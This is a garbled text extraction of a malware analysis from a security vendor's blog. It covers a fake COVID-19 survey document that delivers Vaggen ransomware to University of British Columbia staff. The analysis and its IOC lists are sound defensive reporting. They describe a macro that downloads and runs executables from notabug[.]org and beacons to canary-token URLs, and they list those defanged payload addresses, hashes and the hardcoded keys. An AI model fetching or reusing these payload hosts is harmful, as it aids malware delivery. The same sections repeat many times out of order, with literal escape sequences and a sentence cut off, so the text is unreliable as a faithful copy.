3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3121 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3122 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). 
Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3123 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3124 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3125 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3126 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3127 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3128 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3129 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3130 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3131 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3132 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3133 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3134 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3135 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3136 of 
When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following url and writes it as Polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following url and writes it as Killar.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute Killar.exe
Checks the return value of Shell to see whether the launch succeeded (the return value is the task ID of the started process)
If successful, it sends a GET http request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn't successful, it sends a GET http request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document triggers a notification via the canarytokens.com website. Canary tokens are normally a defensive tool: the owner plants a unique URL and is alerted when anything requests it, which makes a useful early warning that an intruder has had access to a network. Here the attacker uses the same mechanism in reverse, most likely to learn how many people opened the document and perhaps where they are from. Because a different token is requested on success and on failure, the attacker also learns whether the payload actually launched.

Vaggen ransomware
After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’. Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Based on their behaviour, three of them map to the following roles:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware, such as the content of the ransom note, are encrypted with XXTEA (using the xxtea-go library). Each encrypted chunk is first decoded from Base64 and then decrypted with the hardcoded XXTEA key “STALKER”. At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk, which visits every file in the tree below the starting directory.

Files are encrypted with AES-256 (32 byte long key) in GCM mode. The encryption routine is similar to the one demonstrated here: it uses a hardcoded key and a 12 bytes long nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) is:
the 12 byte long nonce
the encrypted content
the 16 byte long GCM tag
gcm.Seal returns the ciphertext with the tag already appended, so the file is simply the nonce followed by Seal's output. Because GCM is an authenticated mode, decryption with the correct key either reproduces the original bytes exactly or fails on the tag check; a wrong key, a truncated file or a modified file cannot produce a silently corrupted result.

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content. Since the key is fixed in the binary rather than generated per victim, every file encrypted by this sample can be recovered the same way.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount
Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3149 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3150 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3151 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3152 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3153 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3154 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3155 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3156 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3157 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3158 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with 